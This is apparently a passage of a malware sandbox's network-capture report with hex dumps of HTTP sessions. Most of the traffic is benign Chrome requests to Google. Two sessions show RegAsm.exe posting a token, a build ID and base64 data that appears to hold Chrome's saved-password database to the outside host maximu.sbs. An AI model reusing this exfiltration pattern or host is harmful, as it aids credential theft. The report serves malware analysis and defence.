                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:21 GMT
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          11192.168.2.449761172.217.18.144437828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC733OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: apis.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC914INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                          Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                          Content-Length: 117446
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 17:01:35 GMT
                                                                                                                                                                                                                                                          Expires: Tue, 13 Jan 2026 17:01:35 GMT
                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                          Last-Modified: Wed, 08 Jan 2025 15:23:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Age: 8209
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC476INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20
                                                                                                                                                                                                                                                          Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f 2e
                                                                                                                                                                                                                                                          Data Ascii: ue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 2e
                                                                                                                                                                                                                                                          Data Ascii: nction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a.
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e
                                                                                                                                                                                                                                                          Data Ascii: or(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this.
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                          Data Ascii: "unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototype
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72
                                                                                                                                                                                                                                                          Data Ascii: ne)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72
                                                                                                                                                                                                                                                          Data Ascii: idden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Err
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                          Data Ascii: is[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototyp
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78
                                                                                                                                                                                                                                                          Data Ascii: ion(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.nex
                                                                                                                                                                                                                                                          2025-01-13 19:18:24 UTC1390INData Raw: 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74 72
                                                                                                                                                                                                                                                          Data Ascii: y.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("Str


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          12192.168.2.449765116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:25 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----4ek6xl68glnyu3wt000z
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 505
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:25 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 34 65 6b 36 78 6c 36 38 67 6c 6e 79 75 33 77 74 30 30 30 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 34 65 6b 36 78 6c 36 38 67 6c 6e 79 75 33 77 74 30 30 30 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 34 65 6b 36 78 6c 36 38 67 6c 6e 79 75 33 77 74 30 30 30 7a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------4ek6xl68glnyu3wt000zContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------4ek6xl68glnyu3wt000zContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------4ek6xl68glnyu3wt000zCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:25 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:25 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          13192.168.2.449768116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:26 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----yuknyc2vkngv37q9r9r9
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 55081
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 6b 6e 79 63 32 76 6b 6e 67 76 33 37 71 39 72 39 72 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 79 75 6b 6e 79 63 32 76 6b 6e 67 76 33 37 71 39 72 39 72 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 79 75 6b 6e 79 63 32 76 6b 6e 67 76 33 37 71 39 72 39 72 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------yuknyc2vkngv37q9r9r9Content-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------yuknyc2vkngv37q9r9r9Content-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------yuknyc2vkngv37q9r9r9Cont
                                                                                                                                                                                                                                                          2025-01-13 19:18:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:26 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
